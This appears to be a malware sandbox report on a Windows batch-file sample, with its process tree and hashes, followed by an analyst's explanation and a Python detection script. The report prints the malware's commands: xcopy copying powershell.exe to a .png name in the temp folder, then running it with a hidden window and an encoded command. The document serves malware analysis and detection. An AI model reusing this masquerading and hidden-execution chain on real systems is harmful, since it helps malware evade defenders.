Analysis

max time kernel: 121s
max time network: 126s
platform: windows7_x64
resource: win7-20231023-en
resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
submitted: 01-12-2023 17:55
Static task: static1

Behavioral task: behavioral1
Sample: 8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
Resource: win7-20231023-en

Behavioral task: behavioral2
Sample: 8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
Resource: win10v2004-20231127-en
General

Target: 8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat
Size: 1009KB
MD5: 8e16ec48c40bfd51e6305c1b2f4e9fa8
SHA1: 24991017d3088f6fc943e11df888591aa34e3055
SHA256: 8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1
SHA512: 7bbad34c6a6f4d5e8316771ffbad11010d8527f3a713b53f115dfa98d2a7bbc6f4596503a3ada325cebe41d472d7e930311e3734f4f24fec8eb90170b2485eba
SSDEEP: 24576:W39YCqk2eQc9YQqzQ2ZBLjXyRnMIT98ZsXBHbrQ:Nrk9OtZdzKnMLZ8ZQ
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  pid 1464  Qzernyi.png

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 1464  Qzernyi.png

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 1464  Qzernyi.png

Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 1464  Qzernyi.png  Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (25 IoCs)
  source pid / process  ->  target pid / process   (occurrences)
  1036 cmd.exe  ->  2072 cmd.exe       (3)
  1036 cmd.exe  ->  2580 xcopy.exe     (3)
  1036 cmd.exe  ->  1612 cmd.exe       (3)
  1612 cmd.exe  ->  2712 cmd.exe       (3)
  1612 cmd.exe  ->  2708 xcopy.exe     (3)
  1612 cmd.exe  ->  2688 cmd.exe       (3)
  1612 cmd.exe  ->  2780 xcopy.exe     (3)
  1612 cmd.exe  ->  1464 Qzernyi.png   (4)
Processes

(depth 1) C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat"
    PID: 1036
    - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      PID: 2072

  (depth 2) C:\Windows\system32\xcopy.exe
      xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qzernyi.png
      PID: 2580

  (depth 2) C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat"
      PID: 1612
      - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        PID: 2712

    (depth 3) C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Qzernyi.png
        PID: 2708

    (depth 3) C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        PID: 2688

    (depth 3) C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Users\Admin\AppData\Local\Temp\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat C:\Users\Admin\AppData\Local\Temp\Qzernyi.png.bat
        PID: 2780

    (depth 3) C:\Users\Admin\AppData\Local\Temp\Qzernyi.png
        C:\Users\Admin\AppData\Local\Temp\Qzernyi.png -win 1 -enc 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
        PID: 1464
        - Executes dropped EXE
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
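What the tree shows: the batch file copies the 32-bit PowerShell binary from SysWOW64 to %TEMP%\Qzernyi.png with xcopy (the `cmd /S /D /c" echo F "` child spawned beside each xcopy is consistent with `echo F | xcopy ...`, which answers xcopy's file-or-directory prompt), copies itself to Qzernyi.png.bat, and then launches the renamed PowerShell with a hidden window (-win 1) and a base64 encoded command (-enc) that the report elides. The "dropped EXE" the signatures flag is therefore a byte-for-byte copy of a Microsoft binary under a .png name, so hash reputation on the dropped file tells you nothing; what is detectable is the copy of an interpreter to a non-executable name and the execution of a non-.exe image with PowerShell switches. The Python below is an added example, not part of the sandbox report: it applies those two checks to process-creation records constructed from the command lines above (the -enc payload is a placeholder generated in the script, since the report elides the real one) and decodes the payload the way PowerShell does, as base64 over UTF-16LE. Record fields and rule names are assumptions.

```python
import base64
import re

# Constructed process-creation records mirroring the command lines in the report
# (pid, image, cmdline). The -enc payload is a placeholder built here because
# the report elides the real one.
SAMPLE_ENC = base64.b64encode("Write-Host constructed".encode("utf-16-le")).decode("ascii")
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
BAT = TEMP + r"\8e065b09f518cdc94ede24c50ab9cb712ff54147b089e4267965462a851276c1.bat"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1036, "image": r"C:\Windows\system32\cmd.exe", "cmdline": 'cmd /c "' + BAT + '"'},
    {"pid": 2580, "image": r"C:\Windows\system32\xcopy.exe",
     "cmdline": "xcopy /d /q /y /h /i " + PS32 + " " + TEMP + r"\Qzernyi.png"},
    {"pid": 2708, "image": r"C:\Windows\system32\xcopy.exe",
     "cmdline": "xcopy /d /q /y /h /i " + PS32 + " " + TEMP + r"\Qzernyi.png"},
    {"pid": 2780, "image": r"C:\Windows\system32\xcopy.exe",
     "cmdline": "xcopy /d /q /y /h /i " + BAT + " " + TEMP + r"\Qzernyi.png.bat"},
    {"pid": 1464, "image": TEMP + r"\Qzernyi.png",
     "cmdline": TEMP + r"\Qzernyi.png -win 1 -enc " + SAMPLE_ENC},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
COPY_TOOLS = {"xcopy.exe", "robocopy.exe"}
EXEC_EXTS = {".exe", ".com", ".scr", ".pif"}
_TOKEN = re.compile(r'"[^"]*"|\S+')


def tokens(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extension(path):
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE text; return None for anything else."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_copy(event):
    """xcopy/robocopy whose source is an interpreter and whose destination is not an executable name."""
    if basename(event["image"]) not in COPY_TOOLS:
        return None
    paths = [t for t in tokens(event["cmdline"])[1:] if not t.startswith("/")]
    if len(paths) < 2:
        return None
    src, dst = paths[0], paths[-1]
    if basename(src) in INTERPRETERS and extension(dst) not in EXEC_EXTS:
        return {"rule": "interpreter_copied_under_non_exe_name", "pid": event["pid"], "src": src, "dst": dst}
    return None


def check_exec(event):
    """A process whose image extension is not executable, started with PowerShell switches.

    PowerShell accepts any unambiguous prefix of a switch, so -e, -ec, -enc and
    -EncodedCommand are all matched by prefix, as are -w, -win and -WindowStyle.
    """
    if extension(event["image"]) in EXEC_EXTS:
        return None
    toks = tokens(event["cmdline"])
    finding = {"rule": "non_exe_image_with_powershell_switches", "pid": event["pid"],
               "image": event["image"], "hidden_window": False, "decoded": None}
    hit = False
    for i in range(1, len(toks) - 1):
        tl = toks[i].lower()
        if len(tl) < 2:
            continue
        if "-encodedcommand".startswith(tl):
            hit = True
            finding["decoded"] = decode_encoded_command(toks[i + 1])
        elif "-windowstyle".startswith(tl) and toks[i + 1].lower() in {"1", "hidden"}:
            hit = True
            finding["hidden_window"] = True
    return finding if hit else None


def scan(events):
    """Run both checks over the records and return findings in event order."""
    findings = []
    for ev in events:
        for check in (check_copy, check_exec):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

Against the constructed records this yields two copy findings (PIDs 2580 and 2708) and one execution finding for PID 1464 with the hidden window set and the placeholder payload decoded; the bat-to-bat copy (PID 2780) and the cmd.exe processes produce nothing. Where Sysmon Event ID 1 is available, the OriginalFileName field (PowerShell.EXE) compared against the Image path is a simpler and more robust signal for the renamed-binary half of this chain; the command-line heuristics above are for telemetry that lacks that field.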
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 442KB
MD5: 92f44e405db16ac55d97e3bfe3b132fa
SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f